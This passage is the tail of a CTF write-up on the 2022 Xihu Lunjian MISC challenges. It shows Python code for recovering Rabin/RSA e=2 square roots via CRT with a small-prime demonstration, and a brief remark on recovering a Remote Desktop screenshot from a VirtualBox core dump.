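            roots.add((sp * q * yq + sq * p * yp) % n)
    return sorted(roots)


def rabin_candidates(c: int, p: int, q: int) -> list:
    """Each root as big-endian bytes; the real message is the one that reads sensibly."""
    return [r.to_bytes((r.bit_length() + 7) // 8, "big") for r in rabin_roots(c, p, q)]


if __name__ == "__main__":
    n, e = parse_rsa_public_key(PUBLIC_KEY_PEM)
    print(f"e = {e}, n is {n.bit_length()} bits, c < n: {int(C_HEX, 16) < n}")
    P, Q = None, None  # placeholder: the factors of n are not reproduced in the writeup
    # Constructed demonstration with small primes, both = 3 (mod 4)
    p, q = 1000000007, 2147483647
    m = int.from_bytes(b"hi", "big")
    for cand in rabin_candidates(pow(m, 2, p * q), p, q):
        print(cand)
```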


This is a fairly new and clever challenge: it relies on the extra VRAM data contained in a VirtualBox ELF core dump to recover a screenshot of the Remote Desktop session, and then finishes with RSA. I had no idea where to start at first; after reading two other people's writeups I slowly worked out the approach.


2022 西湖论剑 MISC challenges, reproduced
http://example.com/2023/11/30/2022西湖论剑MISC复现/
Author: dddkia
Published: November 30, 2023
License